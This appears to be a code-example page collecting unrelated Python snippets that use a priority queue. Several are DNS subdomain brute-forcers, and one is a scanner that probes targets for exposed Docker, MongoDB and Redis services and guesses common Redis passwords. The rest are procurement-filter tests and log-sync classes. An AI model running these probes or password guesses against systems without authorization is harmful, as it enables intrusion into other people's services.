            self.scan_count += 1
            # subdmname has already been validated; now fetch its CNAME
            answers = self.resolvers[j].query(subdmname, 'cname')
            cname = answers[0].target.to_unicode().rstrip('.')
            # cname.endswith(self.target) tells whether the CNAME is a subdomain of the target
            if cname.endswith(self.target) and cname not in self.found_subs:
                # record the CNAME subdomain in self.found_subs

                self.found_subs.add(cname)
                # e.g. with cname 'www.a.shifen.com' and target 'shifen.com', cname_sub is 'www.a'
                # when the CNAME is a subdomain, requeue its prefix: at other levels it may form new subdomains
                cname_sub = cname[:len(cname) - len(self.target) - 1]  # new sub
                self.queue.put((0, cname_sub))
        except:
            pass

    def _scan(self, j):
        # the core worker loop
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]

        while not self.queue.empty():
            try:
                # take one prefix from the queue
                item = self.queue.get(timeout=1.0)[1]
                self.scan_count += 1
            except:
                break
            try:
                # _load_sub_names may have queued subs that still contain wildcards, so expand them here
                if item.find('{alphnum}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
                        self.put_item(item.replace('{alphnum}', _letter, 1))
                    continue
                elif item.find('{alpha}') >= 0:
                    for _letter in 'abcdefghijklmnopqrstuvwxyz':
                        self.put_item(item.replace('{alpha}', _letter, 1))
                    continue
                elif item.find('{num}') >= 0:
                    for _letter in '0123456789':
                        self.put_item(item.replace('{num}', _letter, 1))
                    continue
                elif item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                # skip prefixes that have already been confirmed
                if sub in self.found_subs:
                    continue

                if self._validate_subdomain(j, sub):
                    cur_sub_domain = sub + '.' + self.target
                    self._scan_cname(j, cur_sub_domain)  # check whether the CNAME yields yet another subdomain
                    self.found_count += 1
                    self.outfile.write(cur_sub_domain + '\n')
                    '''
                    On write vs flush: http://blog.csdn.net/fenfeiqinjian/article/details/49444973
                        File streams are buffered: write does not put data into the file directly,
                        it goes to an in-memory buffer first.
                        flush empties that buffer, writing its contents to the file immediately.
                        Normally the OS writes the buffer out automatically once it is full.
                        close calls flush internally before closing, so the data stays complete
                        even when the buffer is not full.
                        If the process exits without close being called, buffered data is lost.
                    '''
                    self.outfile.flush()
                    self.outfile_ips.write(self.cur_ips+'\n')
                    self.outfile_ips.flush()
                    print cur_sub_domain
                    # '{next_sub}.' + sub prepends another prefix level, so deeper multi-level names can be formed
                    self.queue.put((999999999, '{next_sub}.' + sub))

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel):
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer, dns.exception.Timeout):
                pass
            except Exception:
                pass
            print "scan_count=%s,found_count=%s"%(self.scan_count,self.found_count)

    def run(self):
        # i identifies the coroutine and is used inside it to pick a dns resolver
        threads = [gevent.spawn(self._scan, i) for i in range(self.options.get('threads'))]

        try:
            gevent.joinall(threads)
        except KeyboardInterrupt:
            print '[WARNING] User aborted.'

        self.end_time = time.time()
        s = (self.end_time-self.start_time)
        m = ((self.end_time - self.start_time)/60)
        h = ((self.end_time - self.start_time) / 3600)

        self.logfile.write(self.fname+'\n')
        result = "scan_count=%s,found_count=%s"%(self.scan_count,self.found_count)
        self.logfile.write(result+'\n')
        time_consuming = "time-consuming:%d seconds"%s
        print time_consuming
        self.logfile.write(time_consuming+'\n')
        time_consuming = "time-consuming:%d minutes" % m
        print time_consuming
        self.logfile.write(time_consuming+'\n')
        time_consuming = "time-consuming:%d hours" % h
        print time_consuming
        self.logfile.write(time_consuming+'\n')
        # count the domains per level in the result file (self.fname is the output file name)
        ocount, bcount, tcount, fcount = self.get_distribution(self.fname)

        subdomain_count = 'Second-level domains: %d' % ocount
        print subdomain_count
        self.logfile.write(subdomain_count+'\n')
        subdomain_count = 'Third-level domains: %d' % bcount
        print subdomain_count
        self.logfile.write(subdomain_count+'\n')
        subdomain_count = 'Fourth-level domains: %d' % tcount
        print subdomain_count
        self.logfile.write(subdomain_count+'\n')
        subdomain_count = 'Fifth-level domains: %d' % fcount
        print subdomain_count
        self.logfile.write(subdomain_count+'\n')

        self.outfile.flush()
        self.outfile.close()
        self.outfile_ips.flush()
        self.outfile_ips.close()

    def get_distribution(self, filename):
        '''
        Count the second-, third-, fourth- and deeper-level domains in the result file filename.
        '''
        with open(filename, 'rb') as f:
            subdomains = [line.strip() for line in f.readlines()]
        ocount = bcount = tcount = fcount = 0
        for domain in subdomains:
            if domain.count('.') == 2:
                ocount += 1
            elif domain.count('.') == 3:
                bcount += 1
            elif domain.count('.') == 4:
                tcount += 1
            else:
                fcount += 1

        return ocount, bcount, tcount, fcount
Example #14
class TestResourceFilters(unittest.TestCase):
    db = {}
    conf = CONFIG

    @patch('openprocurement.bridge.frameworkagreement.filters.INFINITY')
    @patch('openprocurement.bridge.frameworkagreement.filters.logger')
    def test_CFAUAFilter(self, logger, infinity):
        self.input_queue = PriorityQueue()
        self.filtered_queue = PriorityQueue()

        resource = self.conf['resource'][:-1]

        filter = CFAUAFilter(self.conf, self.input_queue, self.filtered_queue,
                             self.db)
        mock_calls = [call.info('Init Close Framework Agreement Filter.')]
        self.assertEqual(logger.mock_calls, mock_calls)
        extra = {
            'MESSAGE_ID': 'SKIPPED',
            'JOURNAL_{}_ID'.format(resource.upper()): 'test_id'
        }

        infinity.__nonzero__.side_effect = [True, False]
        filter._run()

        doc = {'id': 'test_id', 'dateModified': '1970-01-01'}

        self.input_queue.put((None, doc))
        self.db['test_id'] = '1970-01-01'
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.info(
                '{} test_id not modified from last check. Skipping'.format(
                    resource.title()),
                extra=extra))
        self.assertEqual(logger.mock_calls, mock_calls)

        doc['procurementMethodType'] = 'test'
        doc['dateModified'] = '1970-01-02'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.info('Skipping test {} test_id'.format(resource),
                      extra=extra))
        self.assertEqual(logger.mock_calls, mock_calls)

        filter.procurement_method_types = ('test')
        doc['status'] = 'test_status'
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.info('Skipping test {} test_status test_id'.format(resource),
                      extra=extra))
        self.assertEqual(logger.mock_calls, mock_calls)

        filter.statuses = ('test_status')
        filter.lot_status = 'test_status'
        doc['lots'] = [{'status': 'spam_status'}]
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.info(
                'Skipping multilot {} test_id in status test_status'.format(
                    resource),
                extra=extra))
        self.assertEqual(logger.mock_calls, mock_calls)

        del doc['lots']
        self.input_queue.put((None, doc))
        infinity.__nonzero__.side_effect = [True, False]
        filter._run()
        mock_calls.append(
            call.debug('Put to filtered queue {} test_id'.format(resource)))
        self.assertEqual(logger.mock_calls, mock_calls)
        priority, resource = self.filtered_queue.get()
        self.assertEqual(priority, None)
        self.assertEqual(resource, doc)
Example #15
File: xkscan.py Project: qsdj/xkscan
class Scanner:
    def __init__(self):
        self.start_time = time.time()
        self.queue = PriorityQueue()
        self.history = []
        self.total_count = 0
        self.scan_count = 0
        self._load_target()
        self.outfile = open("log.log", 'w')
        self.console_width = getTerminalSize()[0] - 2

    def _print_msg(self, _msg=None, _found_msg=False):
        if _msg is None:
            msg = '%s TotalCount| %s Scanned in %.2f seconds' % (
                    self.total_count,self.total_count - self.queue.qsize(), time.time() - self.start_time)
            sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        else:
            sys.stdout.write('\r' + _msg + ' ' * (self.console_width - len(_msg)) + '\n')
            self.outfile.write(_msg + '\n')
            self.outfile.flush()
            if _found_msg:
                msg = '%s TotalCount| %s Scanned in %.2f seconds' % (
                        self.total_count,self.total_count - self.queue.qsize(), time.time() - self.start_time)
                sys.stdout.write('\r' + ' ' * (self.console_width - len(msg)) + msg)
        sys.stdout.flush()

    def _load_target(self):
        print '[+] Read targets ...'
        target_file = raw_input("Target File :")
        with open(target_file) as f:
            for line in f.xreadlines():
                target = line.strip()
                self.queue.put(target)

        print "TotalCount is %d" % self.queue.qsize()
        self.total_count = self.queue.qsize()
        print "Now scanning ..."

    def _scan(self,case):
        while not self.queue.empty():
            target = self.queue.get()
            if case == "1":
                self.vulnCheck(target)
            if case == "2":
                self.s2_045(target)
            if case == "3":
                self.headers(target)
            if case == "4":
                self.weakfile(target)
            if case == "5":
                self.portscan_c(target)



#####################################################################
#                                                                   #
#    Vuln poc by:xi4okv QQ:48011203                                 #
#                                                                   #
#####################################################################

    def vulnCheck(self,target):
        if ":2375" in target:        
            try:
                res = requests.head("http://" + str(target) + "/containers/json",timeout=2)
                if res.headers['Content-Type'] == 'application/json':
                    self._print_msg(target + "==>  docker api Vuln",True)
                else:
                    self._print_msg()
            except:
                self._print_msg()
            self._print_msg()

        if ":27017" in target:
            ip,port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000")
                s.send(data)
                result = s.recv(1024)
                if "ismaster" in result:
                    getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000")
                    s.send(getlog_data)
                    result = s.recv(1024)
                    if "totalLinesWritten" in result:
                        self._print_msg(target + "==>  mongodb Vuln",True)
            except Exception, e:
                pass

        if ":6379" in target:
            ip,port = target.split(":")
            try:
                socket.setdefaulttimeout(3)
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("INFO\r\n")
                result = s.recv(1024)
                if "redis_version" in result:
                    self._print_msg(target + "==>  redis Vuln",True)
                elif "Authentication" in result:
                    for pass_ in ['123456','redis','pass','password']:
                        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                        s.connect((ip, int(port)))
                        s.send("AUTH %s\r\n" % (pass_))
                        result = s.recv(1024)
                        if '+OK' in result:
                           self._print_msg(target + "==>  redis pass Vuln :" + pass_,True)
            except Exception, e:
                pass
Example #16
class SyncClient:
    idle = idle
    backward_class = BackwardWorker
    forward_class = ForwardWorker

    def __init__(self,
                 host_url,
                 resource,
                 auth=None,
                 params=None,
                 headers=None,
                 retrievers_params=DEFAULT_RETRIEVERS_PARAMS,
                 adaptive=False,
                 with_priority=False):
        LOGGER.info(f'Init SyncClient for resource {resource}')
        self.host = host_url
        self.auth = auth
        self.resource = resource
        self.adaptive = adaptive
        self.headers = headers

        self.params = params if params is not None else {}
        self.retrievers_params = retrievers_params
        self.queue = PriorityQueue(maxsize=retrievers_params['queue_size'])

    def init_clients(self):
        self.backward_client = ResourceClient(self.host, self.resource,
                                              self.params, self.auth,
                                              self.headers)
        self.forward_client = ResourceClient(self.host, self.resource,
                                             self.params, self.auth,
                                             self.headers)

    def handle_response_data(self, data):
        for resource_item in data:
            self.queue.put(PrioritizedItem(1, resource_item))

    def worker_watcher(self):
        while True:
            if time() - self.heartbeat > DEFAULT_FORWARD_HEARTBEAT:
                self.restart_sync()
                LOGGER.warning(
                    'Restart sync, reason: Last response from workers greater than 15 min ago.'
                )
            sleep(300)

    def start_sync(self):
        LOGGER.info('Start sync...')

        data = self.backward_client.get_resource_items(self.params)

        self.handle_response_data(data[f'{self.resource}s'])

        forward_params = deepcopy(self.params)
        forward_params.update({
            k: v[0]
            for k, v in parse.parse_qs(parse.urlparse(
                data.links.prev).query).items()
        })
        backward_params = deepcopy(self.params)
        backward_params.update({
            k: v[0]
            for k, v in parse.parse_qs(parse.urlparse(
                data.links.next).query).items()
        })

        self.forward_worker = self.forward_class(sync_client=self,
                                                 client=self.forward_client,
                                                 params=forward_params)
        self.backward_worker = self.backward_class(sync_client=self,
                                                   client=self.backward_client,
                                                   params=backward_params)
        self.workers = [self.forward_worker, self.backward_worker]

        for worker in self.workers:
            worker.start()
        self.heartbeat = time()
        self.watcher = spawn(self.worker_watcher)

    def restart_sync(self):
        """
        Restart retrieving from OCDS API.
        """

        LOGGER.info('Restart workers')
        for worker in self.workers:
            worker.kill()
        self.watcher.kill()
        self.init_clients()
        self.start_sync()

    def get_resource_items(self):
        self.init_clients()
        self.start_sync()
        while True:
            if self.forward_worker.check() or self.backward_worker.check():
                self.restart_sync()
            while not self.queue.empty():
                LOGGER.debug(f'Sync queue size: {self.queue.qsize()}',
                             extra={'SYNC_QUEUE_SIZE': self.queue.qsize()})
                LOGGER.debug('Yield resource item',
                             extra={'MESSAGE_ID': 'sync_yield'})
                item = self.queue.get()
                yield item.data
            LOGGER.debug(f'Sync queue size: {self.queue.qsize()}',
                         extra={'SYNC_QUEUE_SIZE': self.queue.qsize()})
            try:
                self.queue.peek(block=True, timeout=0.1)
            except Empty:
                pass
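
PrioritizedItem is referenced in handle_response_data but not shown; a minimal sketch in the spirit of the standard priority-queue recipe (order by priority, never by payload) might be:

from dataclasses import dataclass, field
from typing import Any

@dataclass(order=True)
class PrioritizedItem:
    priority: int
    data: Any = field(compare=False)  # payload excluded from comparisons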
Example #17
class Track:
    def __init__(self, options, target):
        self.start_time = time.time()
        self.options = options
        self.target = target
        self.resolvers = [dns.resolver.Resolver(configure=False) for _ in range(self.options.threads)]
        self.all_dns = dns.resolver.Resolver(configure=False)
        detect_target.detect_target(self.target, True)
        self.dns_servers = dns_server.load_dns_server()
        self.all_dns.nameservers = self.dns_servers  # assign only after the server list has been loaded
        self.dns_server_count = len(self.dns_servers)
        self.queue = PriorityQueue()
        self.priority = 0
        self.scan_count = self.confirm_count = 0
        self.confirm_subdomain = set()
        self.cdn = ''
        self.load_status = {}
        self.load_status = load_subdomain_name.load_sub_name(self.options, self.target, self.priority, self.queue)
        self.priority = self.load_status['priority']
        self.queue = self.load_status['queue']
        self.print_header_info()
        self.outfile = self.outfile_descriptor()


    def outfile_descriptor(self):
        if self.options.outfile:
            outfile_name = self.options.outfile + '.txt'
        else:
            outfile_name = self.target + '.txt'
        f = open(outfile_name, 'w')
        return f

    def print_header_info(self):
        print 'Domain Name\t\t\t\tIP Address\t\tStatus\tCDN\tServer'
        print '------------\t\t\t\t----------\t\t------\t------\t---------'

    def subdomain_track(self, serial):
        dns_serial_number = serial % self.dns_server_count
        self.resolvers[serial].nameservers = [self.dns_servers[dns_serial_number]]
        while not self.queue.empty():
            try:
                subdomain_name = self.queue.get(timeout=1)[1]
                msg = '%.1fs | Found %d \r' % (time.time()-self.start_time, self.confirm_count)
                sys.stdout.write(msg)
                sys.stdout.flush()
                self.scan_count += 1
            except Exception:
                traceback.print_exc()
                sys.exit(1)
            try:
                if subdomain_name in self.confirm_subdomain:
                    continue
                if not self.options.crt:
                    subdomian_url = subdomain_name + '.' + self.target
                else:
                    subdomian_url = subdomain_name

                try:
                    dns_responses = self.resolvers[serial].query(subdomian_url)
                except dns.resolver.NoAnswer:
                    dns_responses = self.all_dns.query(subdomian_url)

                if len(dns_responses) > 1:
                    self.cdn = 'Yes'
                else:
                    self.cdn = 'Unknown'

                server_responses = detect_target.detect_target(subdomian_url)

                if dns_responses and server_responses:
                    self.confirm_subdomain.add(subdomain_name)
                    self.confirm_count += 1
                    ip = dns_responses[0].address
                    if server_responses.get('Server'):
                        server_info = server_responses['Server']
                    else:
                        server_info = 'Unknown'
                    status_code = server_responses['status_code']
                    print '%s\t\t%s\t\t%s\t%s\t%s' % (subdomian_url.ljust(30), ip, status_code, self.cdn, server_info)

                    msg = '%s\t\t%s\t\t%s\t%s\t%s\n' % (subdomian_url.ljust(30), ip, status_code, self.cdn, server_info)
                    self.outfile.write(msg)
                    self.outfile.flush()

            except (dns.resolver.NoAnswer, dns.resolver.NoNameservers, dns.exception.Timeout, dns.resolver.NXDOMAIN) as e:
                pass
            except Exception as e:
                traceback.print_exc()
                sys.exit(1)
Example #18
class SubNameBrute(object):
    def __init__(self, *params):
        (
            self.domain,
            self.options,
            self.process_num,
            self.dns_servers,
            self.next_subs,
            self.scan_count,
            self.found_count,
            self.queue_size_array,
            tmp_dir,
        ) = params
        self.dns_count = len(self.dns_servers)
        self.scan_count_local = 0
        self.found_count_local = 0
        self.resolvers = [
            dns.resolver.Resolver(configure=False)
            for _ in range(self.options.threads)
        ]
        for r in self.resolvers:
            r.lifetime = r.timeout = 10.0
        self.queue = PriorityQueue()
        self.priority = 0
        self.ip_dict = {}
        self.found_subs = set()
        self.timeout_subs = {}
        self.count_time = time.time()
        self.outfile = open(
            "%s/%s_part_%s.txt" % (tmp_dir, self.domain, self.process_num),
            "w")
        self.normal_names_set = set()
        self.load_sub_names()
        self.lock = RLock()

    def load_sub_names(self):
        normal_lines = []
        wildcard_lines = []
        wildcard_set = set()
        regex_list = []
        lines = set()
        with open(self.options.file) as inFile:
            for line in inFile:
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)

                brace_count = sub.count("{")
                if brace_count > 0:
                    wildcard_lines.append((brace_count, sub))
                    sub = sub.replace("{alphnum}", "[a-z0-9]")
                    sub = sub.replace("{alpha}", "[a-z]")
                    sub = sub.replace("{num}", "[0-9]")
                    if sub not in wildcard_set:
                        wildcard_set.add(sub)
                        regex_list.append("^" + sub + "$")
                else:
                    normal_lines.append(sub)
                    self.normal_names_set.add(sub)

        if regex_list:
            pattern = "|".join(regex_list)
            _regex = re.compile(pattern)
            # filter instead of calling remove() while iterating,
            # which silently skips items
            normal_lines = [
                line for line in normal_lines if not _regex.search(line)
            ]

        for _ in normal_lines[self.process_num::self.options.process]:
            self.queue.put((0, _))  # priority set to 0
        for _ in wildcard_lines[self.process_num::self.options.process]:
            self.queue.put(_)

    def scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]
                                         ] + self.dns_servers

        while True:
            try:
                self.lock.acquire()
                if time.time() - self.count_time > 1.0:
                    self.scan_count.value += self.scan_count_local
                    self.scan_count_local = 0
                    self.queue_size_array[
                        self.process_num] = self.queue.qsize()
                    if self.found_count_local:
                        self.found_count.value += self.found_count_local
                        self.found_count_local = 0
                    self.count_time = time.time()
                self.lock.release()
                brace_count, sub = self.queue.get(timeout=3.0)
                if brace_count > 0:
                    brace_count -= 1
                    if sub.find("{next_sub}") >= 0:
                        for _ in self.next_subs:
                            self.queue.put((0, sub.replace("{next_sub}", _)))
                    if sub.find("{alphnum}") >= 0:
                        for _ in "abcdefghijklmnopqrstuvwxyz0123456789":
                            self.queue.put(
                                (brace_count, sub.replace("{alphnum}", _, 1)))
                    elif sub.find("{alpha}") >= 0:
                        for _ in "abcdefghijklmnopqrstuvwxyz":
                            self.queue.put(
                                (brace_count, sub.replace("{alpha}", _, 1)))
                    elif sub.find("{num}") >= 0:
                        for _ in "0123456789":
                            self.queue.put(
                                (brace_count, sub.replace("{num}", _, 1)))
                    continue
            except gevent.queue.Empty as e:
                break

            try:

                if sub in self.found_subs:
                    continue

                self.scan_count_local += 1
                cur_domain = sub + "." + self.domain
                answers = self.resolvers[j].query(cur_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ", ".join(
                        sorted([answer.address for answer in answers]))
                    if ips in ["1.1.1.1", "127.0.0.1", "0.0.0.0", "0.0.0.1"]:
                        continue
                    if self.options.i and is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count_local += 1
                        answers = self.resolvers[j].query(cur_domain, "cname")
                        cname = answers[0].target.to_unicode().rstrip(".")
                        if cname.endswith(
                                self.domain) and cname not in self.found_subs:
                            cname_sub = cname[:len(cname) - len(self.domain) -
                                              1]  # new sub
                            if cname_sub not in self.normal_names_set:
                                self.found_subs.add(cname)
                                self.queue.put((0, cname_sub))
                    except Exception as e:
                        pass

                    first_level_sub = sub.split(".")[-1]
                    if (first_level_sub, ips) not in self.ip_dict:
                        self.ip_dict[(first_level_sub, ips)] = 1
                    else:
                        self.ip_dict[(first_level_sub, ips)] += 1
                        if self.ip_dict[(first_level_sub, ips)] > 30:
                            continue

                    self.found_count_local += 1

                    self.outfile.write(
                        cur_domain.ljust(30) + "\t" + ips + "\n")
                    self.outfile.flush()
                    try:
                        self.scan_count_local += 1
                        self.resolvers[j].query("test-not-existed." +
                                                cur_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        if self.queue.qsize() < 10000:
                            for _ in self.next_subs:
                                self.queue.put((0, _ + "." + sub))
                        else:
                            self.queue.put((1, "{next_sub}." + sub))
                    except Exception as e:
                        pass

            except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                pass
            except dns.resolver.NoNameservers as e:
                self.queue.put((0, sub))  # Retry
            except dns.exception.Timeout as e:
                self.timeout_subs[sub] = self.timeout_subs.get(sub, 0) + 1
                if self.timeout_subs[sub] <= 2:
                    self.queue.put((0, sub))  # Retry
            except Exception as e:
                import traceback

                traceback.print_exc()
                with open("errors.log", "a") as errFile:
                    errFile.write("[%s] %s\n" % (type(e), str(e)))

    def run(self):
        threads = [
            gevent.spawn(self.scan, i) for i in range(self.options.threads)
        ]
        gevent.joinall(threads)
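
Example #18 reuses the priority slot as a count of unexpanded braces: each time a placeholder is filled, the template re-enters the queue with one fewer pending brace, so finished names (count 0) always dequeue ahead of half-expanded templates. A minimal sketch of that expansion loop, assuming gevent is installed ('db{num}' is an illustrative template, not from the example's dictionary):

from gevent.queue import PriorityQueue

queue = PriorityQueue()
queue.put((1, 'db{num}'))
while not queue.empty():
    count, sub = queue.get()
    if count > 0:
        # fill one placeholder and re-queue with a lower brace count
        for ch in '0123456789':
            queue.put((count - 1, sub.replace('{num}', ch, 1)))
        continue
    print sub  # db0 .. db9, emitted only once fully expanded
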
Example #19
0
class SubNameBrute:
    def __init__(self, target, args, process_num, dns_servers, next_subs,
                 scan_count, found_count, queue_size_list, tmp_dir):
        self.target = target.strip()
        self.args = args
        self.process_num = process_num
        self.dns_servers = dns_servers
        self.dns_count = len(dns_servers)
        self.next_subs = next_subs
        self.scan_count = scan_count
        self.scan_count_local = 0
        self.found_count = found_count
        self.found_count_local = 0
        self.queue_size_list = queue_size_list

        self.resolvers = [
            dns.resolver.Resolver(configure=False) for _ in range(args.threads)
        ]
        for _r in self.resolvers:
            _r.lifetime = _r.timeout = 6.0

        self.queue = PriorityQueue()
        self.item_index = 0
        self.priority = 0
        self._load_sub_names()
        self.ip_dict = {}
        self.found_subs = set()
        self.ex_resolver = dns.resolver.Resolver(configure=False)
        self.ex_resolver.nameservers = dns_servers
        self.local_time = time.time()
        self.outfile = open(
            '%s/%s_part_%s.txt' % (tmp_dir, target, process_num), 'w')
        self.outfile_html = open('tmp/%s_html_%s.txt' % (target, process_num),
                                 'w')

    def _load_sub_names(self):
        if self.args.full_scan and self.args.file == 'subnames.txt':
            _file = 'Dict/subnames_full.txt'
        else:
            if os.path.exists(self.args.file):
                _file = self.args.file
            elif os.path.exists('Dict/%s' % self.args.file):
                _file = 'Dict/%s' % self.args.file
            else:
                print_msg('[ERROR] Names file not found: %s' % self.args.file)
                exit(-1)

        normal_lines = []
        lines = set()
        with open(_file) as f:
            for line in f:
                sub = line.strip()
                if not sub or sub in lines:
                    continue
                lines.add(sub)
                normal_lines.append(sub)

        for item in normal_lines[self.process_num::self.args.process]:
            self.priority += 1
            self.queue.put((self.priority, item))

    def _scan(self, j):
        self.resolvers[j].nameservers = [self.dns_servers[j % self.dns_count]]
        while not self.queue.empty():
            try:
                item = self.queue.get()[1]
                self.scan_count_local += 1
                if time.time() - self.local_time > 3.0:
                    self.scan_count.value += self.scan_count_local
                    self.scan_count_local = 0
                    self.queue_size_list[self.process_num] = self.queue.qsize()
            except Exception as e:
                break
            try:
                if item.find('{next_sub}') >= 0:
                    for _ in self.next_subs:
                        self.queue.put((0, item.replace('{next_sub}', _, 1)))
                    continue
                else:
                    sub = item

                if sub in self.found_subs:
                    continue

                cur_sub_domain = sub + '.' + self.target
                _sub = sub.split('.')[-1]
                try:
                    answers = self.resolvers[j].query(cur_sub_domain)
                except dns.resolver.NoAnswer as e:
                    answers = self.ex_resolver.query(cur_sub_domain)

                if answers:
                    self.found_subs.add(sub)
                    ips = ', '.join(
                        sorted([answer.address for answer in answers]))
                    if ips in ['1.1.1.1', '127.0.0.1', '0.0.0.0']:
                        continue

                    if self.args.intranet and is_intranet(answers[0].address):
                        continue

                    try:
                        self.scan_count_local += 1
                        answers = self.resolvers[j].query(
                            cur_sub_domain, 'cname')
                        cname = answers[0].target.to_unicode().rstrip('.')
                        if cname.endswith(
                                self.target) and cname not in self.found_subs:
                            self.found_subs.add(cname)
                            cname_sub = cname[:len(cname) - len(self.target) -
                                              1]
                            self.queue.put((0, cname_sub))

                    except:
                        pass

                    if (_sub, ips) not in self.ip_dict:
                        self.ip_dict[(_sub, ips)] = 1
                    else:
                        self.ip_dict[(_sub, ips)] += 1
                        if self.ip_dict[(_sub, ips)] > 30:
                            continue

                    self.found_count_local += 1
                    if time.time() - self.local_time > 3.0:
                        self.found_count.value += self.found_count_local
                        self.found_count_local = 0
                        self.queue_size_list[
                            self.process_num] = self.queue.qsize()
                        self.local_time = time.time()

                    self.outfile_html.write(
                        PrintHtml.Sub_html_print(cur_sub_domain, ips))
                    self.outfile_html.flush()
                    self.outfile.write(
                        cur_sub_domain.ljust(30) + '\t' + ips + '\n')
                    self.outfile.flush()
                    try:
                        self.resolvers[j].query('myzxcghelloha.' +
                                                cur_sub_domain)
                    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer) as e:
                        self.queue.put((999999999, '{next_sub}.' + sub))
                    except:
                        pass

            except (dns.resolver.NXDOMAIN, dns.name.EmptyLabel) as e:
                pass
            except (dns.resolver.NoNameservers, dns.resolver.NoAnswer,
                    dns.exception.Timeout) as e:
                pass
Example #20
0
class TestStatuslistFilter(unittest.TestCase):
    def setUp(self):
        self.conf = CONFIG
        self.db = {}
        self.input_queue = PriorityQueue()
        self.filtered_queue = PriorityQueue()
        self.filter = StatuslistFilter(self.conf, self.input_queue,
                                       self.filtered_queue, self.db)

    @patch('openprocurement.bridge.rbot.filters.INFINITY')
    def test_filter_ok(self, infinity):
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-02',
            'procurementMethodType': 'dgf',
            'status': 'active.tendering',
            'documents': [{
                'documentType': 'contractProforma'
            }]
        }

        self.input_queue.put((None, deepcopy(doc)))
        self.filter._run()
        self.assertEqual(len(self.filtered_queue), 1)
        filtered_doc = self.filtered_queue.get(block=False)
        self.assertEqual(doc, filtered_doc[1])

    @patch('openprocurement.bridge.rbot.filters.INFINITY')
    def test_filter_not_modified(self, infinity):
        # Not changed dateModified
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status1',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }

        self.input_queue.put((None, deepcopy(doc)))
        self.db['test_id'] = '1970-01-01'

        self.filter._run()
        self.assertEqual(len(self.filtered_queue), 0)
        self.db.pop('test_id')

    @patch('openprocurement.bridge.rbot.filters.INFINITY')
    def test_filter_by_status(self, infinity):
        # Wrong tender status
        infinity.__nonzero__.side_effect = [True, False]
        doc = {
            'id': 'test_id',
            'dateModified': '1970-01-01',
            'procurementMethodType': 'dgf',
            'status': 'status3',
            'documents': [{
                'documentType': 'contractProforma'
            }],
        }

        self.input_queue.put((None, deepcopy(doc)))
        self.filter._run()
        self.assertEqual(len(self.filtered_queue), 0)
Example #21
0
File: core.py  Project: scalp42/awslogs
class AWSLogs(object):

    ACTIVE = 1
    EXHAUSTED = 2
    WATCH_SLEEP = 2

    def __init__(self, **kwargs):
        self.connection_cls = kwargs.get('connection_cls', AWSConnection)
        self.aws_region = kwargs.get('aws_region')
        self.aws_access_key_id = kwargs.get('aws_access_key_id')
        self.aws_secret_access_key = kwargs.get('aws_secret_access_key')
        self.log_group_name = kwargs.get('log_group_name')
        self.log_stream_name = kwargs.get('log_stream_name')
        self.watch = kwargs.get('watch')
        self.color_enabled = kwargs.get('color_enabled')
        self.output_stream_enabled = kwargs.get('output_stream_enabled')
        self.output_group_enabled = kwargs.get('output_group_enabled')
        self.start = self.parse_datetime(kwargs.get('start'))
        self.end = self.parse_datetime(kwargs.get('end'))
        self.pool_size = max(kwargs.get('pool_size', 0), 10)
        self.max_group_length = 0
        self.max_stream_length = 0
        self.publishers = []
        self.events_queue = Queue()
        self.raw_events_queue = PriorityQueue()
        self.publishers_queue = PriorityQueue()
        self.publishers = []
        self.stream_status = {}
        self.stream_max_timestamp = {}

        self.connection = self.connection_cls(
            self.aws_region,
            aws_access_key_id=self.aws_access_key_id,
            aws_secret_access_key=self.aws_secret_access_key)

    def _get_streams_from_patterns(self, log_group_pattern,
                                   log_stream_pattern):
        """Returns pairs of group, stream matching ``log_group_pattern`` and
        ``log_stream_pattern``."""
        for group in self._get_groups_from_pattern(log_group_pattern):
            for stream in self._get_streams_from_pattern(
                    group, log_stream_pattern):
                yield group, stream

    def _get_groups_from_pattern(self, pattern):
        """Returns groups matching ``pattern``."""
        pattern = '.*' if pattern == 'ALL' else pattern
        reg = re.compile('^{0}'.format(pattern))
        for group in self.get_groups():
            if re.match(reg, group):
                yield group

    def _get_streams_from_pattern(self, group, pattern):
        """Returns streams in ``group`` matching ``pattern``."""
        pattern = '.*' if pattern == 'ALL' else pattern
        reg = re.compile('^{0}'.format(pattern))
        for stream in self.get_streams(group):
            if re.match(reg, stream):
                yield stream

    def _publisher_queue_consumer(self):
        """Consume ``publishers_queue`` api calls, run them and publish log
        events to ``raw_events_queue``. If ``nextForwardToken`` is present
